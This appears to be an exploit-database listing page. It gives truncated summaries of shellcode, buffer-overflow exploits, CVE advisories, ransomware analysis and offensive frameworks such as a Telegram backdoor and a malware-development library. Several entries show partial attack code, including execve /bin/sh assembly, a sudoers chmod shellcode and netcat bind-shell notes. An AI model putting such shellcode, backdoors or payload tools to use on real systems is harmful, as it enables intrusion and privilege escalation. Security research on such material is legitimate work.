SharpShooter - Payload Generation Framework
SharpShooter is a payload creation framework for the retrieval and execution of arbitrary CSharp source code. SharpShooter is capable of creating payloads in a variety of formats, including HTA, JS, VBS and WSF. It leverages James Forshaw's DotNetToJavaScript tool to invoke methods from the...
openbuildservice Code Injection Vulnerability
openbuildservice is a general purpose system for distributing software. The system builds and distributes software packages in an automated, consistent and repeatable manner. A security vulnerability exists in the web ui in openbuildservice. An attacker can exploit this vulnerability to execute...
CVE-2011-3178
In the web ui of the openbuildservice before 2.3.0 a code injection of the project rebuildtimes statistics could be used by authorized attackers to execute shellcode...
Linux/x86-64 - Execute /bin/sh Shellcode (24 bytes)
Linux/x86-64 - Execute /bin/sh Shellcode, 24 bytes. Shellcode exploit for the Linux/x86-64 platform / global _start section .text _start: push 59 pop rax cdq push rdx mov rbx,0x68732f6e69622f2f push rbx push rsp pop rdi push rdx push rdi push rsp pop rsi syscall / include include char code =...
Linux/x86 chmod 777 /etc/sudoers Shellcode (36 bytes)
/ Description ; Title : chmod 777 /etc/sudoers - Shellcode ; Author : Hashim Jawad ; Website : ihack4falafel.com ; Twitter : @ihack4falafel ; SLAE ID : SLAE-1115 ; Purpose : chmod /etc/sudoers permissions ; OS : Linux ; Arch : x86 ; Size : 36 bytes chmod.nasm global start section .text start: ;...
Socusoft Photo 2 Video Converter 8.0.0 - Local Buffer Overflow
Exploit Title: Socusoft Photo 2 Video Converter v8.0.0 Local Buffer Overflow Free and Professional variants Date: 01/12/2017 Exploit Author: Jason Magic ret2eax Vendor Homepage: www.socusoft.com Version: 8.0.0 Tested on: Windows Server 2008 R2 Socusoft's Photo 2 Video Converter v8.0.0 Free and...
Devil's Ivy vulnerability(CVE-2017-9765)
When we began a security analysis of remote configuration services last year, we had no idea it would lead us to uncover vulnerabilities that affect so many users. We have been studying the prevalence and nature of the vulnerabilities that arise in remote configuration services, so when we...
Exploring the crypt: Analysis of the WannaCrypt ransomware SMB exploit propagation
Note: Read our latest comprehensive report on ransomware: Ransomware 1H 2017 review: Global outbreaks reinforce the value of security hygiene. On May 12, there was a major outbreak of WannaCrypt ransomware. WannaCrypt directly borrowed exploit code from the ETERNALBLUE exploit and the DoublePulsa...
Immunity Canvas: IIS6_PROPFIND
Name | iis6propfind
---|---
CVE | CVE-2017-7269
Exploit Pack | CANVAS
Description | IIS 6.0 PROPFIND ScStoragePathFromUrl Stack Buffer Overflow
Notes | References: 'https://vulners.com/cve/CVE-2017-7269', 'https://github.com/edwardz246003/IISexploit' CVE Name: CVE-2017-7269 VENDOR: Microsoft...
EGESPLOIT - A Golang Library For Malware Development
EGESPLOIT is a golang library for malware development, it has few unique functions for meterpreter integration. DOCUMENTATION CalculateChecksumx : Function calculates x digit 8 bit checksum for reverse HTTP/HTTPS meterpreter connections, returns the calculated checksum as string...
Internet Bug Bounty: Adobe Flash Player PSDK Class Use After Free Vulnerability
I. Summary Adobe Flash Player is prone to a vulnerability which leads to Use After Free. Since the release condition is highly controllable, it is feasible to build a fully working exploit for shellcode execution with proper AS3 object occupied the original PSDK memory...
Linux/x86-64 - NetCat Bind Shell Shellcode (64 bytes)
include include // Exploit Title: NetCat Bind Shell 64bit 64byte // Date: 6/28/2016 // Exploit Author: CripSlick // Tested on: Kali 2.0 // Version: v1.10-41 // email protected // OffSec ID: OS-20614 // Victim: netstat -an | grep LISTEN | grep tcp // Attacker: nc unsigned char code = \ define PORT...
Angler Exploit Kit Evading EMET
We recently encountered some exploits from Angler Exploit Kit EK that are completely evading Microsoft’s Enhanced Mitigation Experience Toolkit EMET. This is something we are seeing for the first time in the wild, and we only observed it affecting systems running Windows 7. Angler EK uses complex...
Bt2 - Blaze Telegram Backdoor Toolkit
bt2 is a Python-based backdoor in the form of an IM bot that uses the infrastructure and the feature-rich bot API provided by Telegram, slightly repurposing its communication platform to act as a C&C. Dependencies Telepot requests Installation $ sudo pip install telepot $ sudo pip install requests PS:...
Internet Bug Bounty: Adobe Flash Player ASnative(101,10) Memory Corruption Vulnerability
I. Summary Adobe Flash Player is prone to a vulnerability which leads to Memory Corruption. ------------------------------------------------------------------ II. Description When ASnative(101,10) is called with a MovieClip object pointer, Flash Player crashes due to an invalid EIP value...
Linux x86 Download & Execute Shellcode
Linux x86 Download & Execute Shellcode. Shellcode exploit for the Linux/x86 platform / -------------------------------------------------------------------------------------------------------- + Author : B3mB4m Contact : [email protected] Project : https://github.com/b3mb4m/Shellsploit Greetz :...
PT-2016-7990
PInfo 0.6.9-5.1 contains a local buffer overflow vulnerability that allows local attackers to execute arbitrary code by supplying an oversized argument to the -m parameter. Attackers can craft a malicious input string with 564 bytes of padding followed by a return address to overwrite the...
VeryPDF Image2PDF Converter SEH Buffer Overflow
Exploit Title: VeryPDF Image2PDF Converter SEH Buffer Overflow Date: 10-7-2015 Software Link: http://www.verypdf.com/tif2pdf/img2pdf.exe Exploit Author: Robbie Corley Platform Tested: Windows 7 x64 Contact: [email protected] Website: CVE: Category: Local Exploit Description: The title paramet...
Heroes Of Might And Magic III .h3m Map File Buffer Overflow Exploit
This Metasploit module embeds an exploit into an uncompressed map file .h3m for Heroes of Might and Magic III. Once the map is started in-game, a buffer overflow occurring when loading object sprite names leads to shellcode execution. This module requires Metasploit: http://metasploit.com/downloa...